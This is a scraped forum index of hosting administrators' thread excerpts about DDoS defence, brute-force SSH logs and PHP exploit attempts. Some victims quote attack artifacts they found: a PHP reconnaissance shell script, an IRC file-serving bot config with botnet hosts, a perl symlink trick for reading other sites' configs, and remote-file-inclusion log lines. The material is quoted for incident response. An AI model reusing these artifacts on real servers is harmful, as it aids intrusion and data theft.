AWStats Exploit Attempt Prevention

Jun 4, 2008

one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to

GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"

View 0 Replies


ADVERTISEMENT

DDoS Prevention .....

May 13, 2009

I have searched for prevention methods and explanations on what DoS's and DDoS's are capable of. I was hoping someone could shed some light on free alternatives that would help reduce these attacks or help to make me aware if one were to occur.

Linux Distro: CentOS 5.3

I am not running apache or any web related services on my machine.

I run a dedicated server for the sole purpose of hosting a few game servers. I have already contacted my provider and they offered a $599 /mo plan for prevention. This is unreasonable and I simply cannot afford it. I have been threatened with a DDoS because one of my administrators banned a player constantly creating drama, stress, and breaking rules.

I simply cannot afford a gigantic bandwidth bill and this scare tactic has made me a little weary. Is there anything I can do to reduce the damage?

View 8 Replies View Related

UDP D/DoS Attack - Best Prevention

Apr 27, 2008

I would like to know what are the best ways in preventing a UDP D/DoS Attack. DDoS-Deflate and most programs like that are just for TCP connections, and most of the time only for port 80. What is the best option out there for protection (linux wise) for UDP attacks. I was using shorewall before but it did not do so well so I just switched now to CSF [url] with WebMin and seems to be working ok. Even though thoes are both firewalls, they seem to have some protection against UDP Attacks. Please note this is a server that just hosts some game servers, no webhosting. What would be my best option here?

View 3 Replies View Related

How And Which HW Device Do I Need For DDoSS Prevention?

Jan 10, 2007

I have linux server and like to put somekind of DDOS prevention/protection... what kind of device do I need to purcahse to do this?

can anyone advise on this?

View 3 Replies View Related

DDOS Prevention Options

Mar 23, 2009

My host has told me that my forum is coming under a DDOS attack. Once was on Friday March 20th and again today (monday march 23). Before those two, there are attacks almost every week, sometimes twice a week.

The host installed DoS-Deflate. It started blocking legitimate traffic and had to be removed.

The operating system is Linux CentOS, the forum software is VBulletin. The server is a VPS with 1 gig of memory.

Besides DoS-Deflate, what other options are out there?

View 7 Replies View Related

DDoS Prevention By Softlayer

May 20, 2009

any experience with the DDoS prevention feature provided by SoftLayer?

View 6 Replies View Related

Prevention From Server Overload

Oct 27, 2008

Today my server was down cause it was overloaded and when i restart my server its running how to stop such problem in the future

View 10 Replies View Related

Prevention LFI And SQL Injection Attacks

May 12, 2008

i am seeing a lot of Local file inclusion (LFI) and mysql injection attacks quite often directed to php scripts.

what is the way to prevent them? would installing mod_security to apache work?

View 6 Replies View Related

Hotlink Prevention Scripts

May 21, 2008

if anyone knows a script that is url rewrite mods that can fix this hotlink issue by having the link url change every 20 minute.

View 2 Replies View Related

How Can I Prevention From Ddos Attack

May 21, 2007

I have a VPS from hostforweb.com , and my vps every week under ddos attack and 80-150 connection login to apache...

how can i prevention from ddos attack?

View 3 Replies View Related

Hot Link Prevention And Browser Security

Dec 23, 2007

I recently initiated "Hot Link Prevention" on one of my web sites on my Dedicated server (via CPanel). It woks well in re-directing hotlinked images to a small image that says "Unauthorized Hotlink Image." This of course prevents other web sites from leaching my bandwidth. However, I have had a number of people complain that when they visit my forum, they don't get my site's images, but instead see the Unauthorized Hotlink Image. The common thread seems to be the people with the problem are using Security Software. In one case, a guy is using Norton Confidential. Another guy is using some Security software provided by his ISP. I'm guessing that this security software is somehow messing with the Referer in tehir browser and confusing my server into thinking the images are being hotlinked from some other site. Short of turning off Hot Link Prevention, does anyone have any suggestions to tell the folks...are there settings in their Security Software for example that will prevent the problem when they visit my site?

View 4 Replies View Related

Possible Break-in Attempt

Mar 19, 2008

I have reported this to BurstNET admin/abuse/NOC and have added a line to block them for now.

Does this belong to anyone??? Nslookup/dig reveals nothing.

This is my /var/log/messages
Mar 19 19:24:50 ginger sshd[11565]: Failed password for root from 66.197.245.241 port 46346 ssh2
Mar 19 19:24:50 ginger sshd[11565]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:51 ginger sshd[11567]: Failed password for root from 66.197.245.241 port 46407 ssh2
Mar 19 19:24:52 ginger sshd[11567]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:53 ginger sshd[11569]: Failed password for root from 66.197.245.241 port 46468 ssh2
Mar 19 19:24:53 ginger sshd[11569]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:55 ginger sshd[11571]: Failed password for root from 66.197.245.241 port 46531 ssh2
Mar 19 19:24:55 ginger sshd[11571]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - POSSIBLE BREAK-IN ATTEMPT!
Mar 19 19:24:57 ginger sshd[11573]: Failed password for root from 66.197.245.241 port 46584 ssh2
Mar 19 19:24:57 ginger sshd[11573]: reverse mapping checking getaddrinfo for 66-197-245-241.hostnoc.net failed - !POSSIBLE BREAK-IN ATTEMPT

View 7 Replies View Related

Is This A Hacking Attempt

Feb 22, 2007

my referals logs that I keep on a website, I have come accross the following this morning, Is this some one who is trying to gain access to the server etc.

[url]
[url]
[url]
[url]
[url]

I have the Ip addresses that they have come from and it resolves to a Russian (I Think) website.

Im just looking through all the folders on the server now and no data has been comprimised as far as I can see and im going to use the query strings in order to block access and also deny access via ip address.

View 1 Replies View Related

Hack Attempt

Jan 31, 2007

I have started seeing the following error in the Event Viewer every day:

"An anonymous session connected from xxx.xxx.xxx.xxx has attempted to open an LSA policy handle on this machine. The attempt was rejected with STATUS_ACCESS_DENIED to prevent leaking security sensitive information to the anonymous caller. The application that made this attempt needs to be fixed. Please contact the application vendor. As a temporary workaround, this security measure can be disabled by setting the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaTurnOffAnonymousBlock DWORD value to 1. This message will be logged at most once a day."

The IP address is different every time. It is not an internal IP address or any I recognize. It is from the outside. I have read about this in the Microsoft site but it only mentioned how it might be an internal service/application attempting the access. This is not my case since I am seeing remote IP addresses. Anyone can help me dig deeper into this? How can I find out more about what's going on?

View 3 Replies View Related

Hacking Attempt

Sep 13, 2007

see the log entries below:

LogFormat "%h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i" "%{X-Forwarded-For}i""

1.2.3.4 - -[12/Sep/2007:11:15:38 +0900] "GET /~kjm/security/ml-archive/bugtraq/2006.04/msg00283.html//footer.inc.php?settings[footer]=[url]HTTP/1.1" 404 268 "-" "libwww-perl/5.808" "-"

1.2.3.4 - - [12/Sep/2007:11:16:00 +0900] "GET //footer.inc.php?settings[footer]=[url] HTTP/1.1" 404 213 "-" "libwww-perl/5.808" "-"

What can you say from the above log entries?

View 1 Replies View Related

PHP/GIF Exploit

Jun 23, 2007

I read about a new exploit that imbeds PHP code in a GIF file:
[url]

How would that work exactly? Wouldn't a server have to be set up specifically to parse PHP code in gif files? Who would set up their server that way? Is there a way around that so you can remotely trick the server into parsing gif files as PHP code?

View 3 Replies View Related

New PHP Exploit

Sep 11, 2007

check this out [url]

That could do some damage, all someone would have to do is get shell on a site or be able to see config.php and then connect with that database and mass deface the server or put shells on other sites.

Anyone know of any way to prevent this?

View 14 Replies View Related

PHP Exploit

Nov 25, 2007

Just discovered a php exploit on a client's domain.

Found this in the access_log

[url]
=
[url]

Take a look at rmod.txt
[url]

then found this in a conf.txt in the /pearus/.bash folder

Quote:

statefile Infodll.state
connectionmethod direct
server animefox.no-ip.biz 6666
server animefox.no-ip.biz 6667
server animefox.no-ip.biz 6668
server animefox.no-ip.biz 6669
server animefox.no-ip.biz 7000
server animefox2.no-ip.biz 6666
server animefox2.no-ip.biz 6667
server animefox2.no-ip.biz 6668
server animefox2.no-ip.biz 6669
server animefox2.no-ip.biz 7000
server animefox.no-ip.biz 6666
server animefox.no-ip.biz 6667
server animefox.no-ip.biz 6668
server animefox.no-ip.biz 6669
server animefox.no-ip.biz 7000
server animefox2.no-ip.biz 32000
server animefox2.no-ip.biz 40000
server animefox2.no-ip.biz 42000
server animefox2.no-ip.biz 44000
server animefox2.no-ip.biz 48000
channel ###Snake###
channel #PoIsOn_MuSiC
adminpass f2oL8zmnIG/CA
user_nick PoIsOn|MuSiC|030
#local_vhost 123.456.789.123
#tcprangestart 4000
#usenatip 123.456.789.123
user_realname ...::::9PoIsOn CrEw::::...
user_modes +ix
loginname r0x
slotsmax 10
queuesize 30
maxtransfersperperson 1
maxqueueditemsperperson 2
restrictlist yes
restrictprivlist no
restrictsend yes
restrictprivlistmsg Per la lista [url]
respondtochannelxdcc no
respondtochannellist no
headline 9,2 ..::4T11h0e 13B9e11S7t 4C11h9a8n7n8e7L 11O4f 11T7h4e 8W13o8r9l7D11::..
creditline 9,2 ..::4T11h0e 13B9e11S7t 4C11h9a8n7n8e7L 11O4f 11T7h4e 8W13o8r9l7D11::..
adminhost *!*@PoIsOn.CrEw
adminhost SilverFox!*@*.*
uploadhost *!*@PoIsOn.CrEw
uploadhost *!*@P.o.I.s.O.n
downloadhost *!*@*.*
hideos yes
filedir /home/httpd/vhosts/domain.com/httpdocs/pearus/.bash
uploaddir /home/httpd/vhosts/domain.com/httpdocs/pearus/.bash
#

contents of the .bash folder:

Quote:

-rw-r--r-- 1 apache apache 1729 Nov 23 11:44 conf.txt
-rwxr-xr-x 1 apache apache 214350 Nov 5 06:01 httpd
-rwxr-xr-x 1 apache apache 214382 Nov 5 06:01 httpd_chroot
-rw-r--r-- 1 apache apache 268 Nov 25 13:25 Infodll.state
-rw-r--r-- 1 apache apache 268 Nov 25 13:23 Infodll.state~
-rw-r--r-- 1 apache apache 268 Nov 19 06:12 mybot.state
-rw-r--r-- 1 apache apache 268 Nov 19 06:09 mybot.state~
-rw-r--r-- 1 apache apache 604160 Sep 23 09:07 Poi.tar
-rwxrwxrwx 1 apache apache 41 Nov 25 10:52 restart

Still trying to dig in some more to figure out how they were able to exploit
here's the first few lines of their blog.php

Quote:

<?php
session_cache_limiter('none');
session_start();
ob_start();
?>
<?php include_once("oneadmin/config.php");
include_once($path["docroot"]."common/session.php"); ?>

View 9 Replies View Related

Is This A New Exploit

Nov 29, 2007

several of our dedicated servers got hacked,(NOT rooted), but many of sites on each server got hacked.

after tracing the hacking process, we found that the hacker only put a "perl" file contain:


++++++++++cut here+++++++++
symlink("/link/to/victim/configs","/link/to/local/hacker/site");

+++++++++++cut here++++++++++++

and then we found many links of victim config files on the local hacker site!

all servers runing with:

-php 4.4.7
-centos 4.5
-cpanel

i tried to do the same way by a normal user, but i get the "Permission denied" error and i can not read the linked files!

so how can i prevent the function "symlink" from executing using perl?

is there any new exploit in php/perl?

View 8 Replies View Related

PHP Exploit

Nov 24, 2007

My provider sent me an abuse ticket with the message below. This is a cPanel server with 300 domains. How do I go about tracking down the problem? They can’t give me anymore information and I don’t know where else to look.

This ticket was automatically generated by the XXXXXXXXXXXXXX Network Protection System. An unusual amount of traffic has been detected involving your IP address xx.xx.xx.xx.

Details of the event follow:

3885: HTTP: PHP File Include Exploit

This filter detects an attempt to post the contents of an external script to a PHP application. This behavior is typical of a PHP file include vulnerability attack. This attack could allow an attacker to insert custom code into a variable that would be executed by all users of the vulnerable application.

View 6 Replies View Related

Hacking Attempt On Site

Jul 20, 2008

I am having issue with my server. Someone is trying to execute some code and possibly trying mysql injection method.

I have pasted the code below.

Please suggest what can be done in this case.

Regards
Gagandeep

+++++++++++

The person tried to use different IPs and different websites to execute the code.

URL >> IP

[url]

[url]

[url]

ftp://212.11.127.86/tmp/trem/1? >> 87.118.118.156

There are many such queries under my logs.

The person is using different IPs, so, i can't even block that many IPs.

++++++++++++

The CODE

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "Osirys<br>";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;
?>

View 5 Replies View Related

Notifying DC Of Hack Attempt

May 30, 2007

Usually I just block offending machines that try to get into our systems and move on but for the last 2 days I have started notifying the contacts on the arin info for offending IP's. I guess I am trying to do my part to make the internet a better place?

Is this stuff largely ignored?

Is anyone else doing this?

Is there an easier way?

View 14 Replies View Related

Hack Attempt? I'm Pretty Sure...

Jul 8, 2007

A new client has just opened up an account and the first thing hes installed at a few scripts called r57shell and c99shell. I'm not very familiar with these two scripts, but by the looks of them their root kits of some sort. Amd I correct in thinking this?

The account has been susspended for the time being.

View 12 Replies View Related

EXploit Scanner (cxs)

Nov 6, 2009

CSF install the new version, I warned that the option Check for cxs. I had a few questions!

1 - is it free? And can be installed and will work?

2 - I like these things are additional to the installation?

3 - a bit about this new possibility to explain how to solve the case to get out of the red.

View 14 Replies View Related

Kernel Exploit

Jun 28, 2008

How Can i translate An Kernel Exploit to secure my server like that

[url]

how can i now what i do to my server if i see any exploit

View 4 Replies View Related

TikiWiki Exploit

Jan 2, 2008

Has anyone has to deal with a recent exploit of TikiWiki (comes as one of the available Fantastico scripts)? I found my server had been compromised quite by accident. I was Googleing my domain just to see what came up and found a bunch of pages with links to Porn sites that were in some sub directories in my TikiWiki install. This article discusses:

[url]

Just wondering if anyone here has had to deal with this and if there in anything else I should do that is not discussed in thie article?

View 0 Replies View Related

What To Do About These Exploit Attempts

Jun 10, 2008

have found open servers and are trying to execute:

Site: MYSite (mydomain.com)
Error Code: 404 Missing URL ()
Occurred: Tue Jun 10 17:57:20 MDT 2008
Requested URL: //mypanel/clientarea.php?action=[url]
User Address: 67.15.183.164
User Agent: libwww-perl/5.805
Referer:

"Alartist" seems to be an Arabic site while the IP seems to be hosted by the Planet.

Anyone else seeing these?

View 5 Replies View Related

PHP Mail() Exploit

Feb 14, 2007

I have been having trouble with my server lately sending out a lot of emails and I thought I had tracked it down to people taking advantage of some mailing lists which I took care of.

What I ran into today is I have a business where I send out emails using a php script in our shopping cart. Well I got a lot of failure emails back that caught my attention. They have about 200 random email listings that are not in my database saying why they can't be delivered and then a copy of the actual newsletter that I just sent today.

So is it possible that some where something is injecting this BCC field into the php mail()? If so, is there something that I can do to find this script?

Box is set to poplock 20min, smtp auth on, firewall has been up for years, chkrootkit is clean.

View 11 Replies View Related

Cpanel Exploit

Mar 30, 2007

I've been checking my logs and I'm seeing a TON of referers like...

Quote:

Originally Posted by Logs

[url]

Is this some kind of new Cpanel exploit?

View 7 Replies View Related

Possible R0nin Exploit

May 6, 2007

I think i have a security problem about my server. I have centos4.4 2gb ram of server. Plesk 8.1 control panel

It is a dedicated server. Http crashed and when i want to restart apache it give address already in use error. Then while i was googling for solution for this, i found a solution and check which service is using that port and i saw r0nin there

I dont know if it is an exploit or how it infected and how to solve. I attached a screenshot below.

I will be glad if you can give me some more information about it. Also i am using apf as firewall on my server

View 14 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved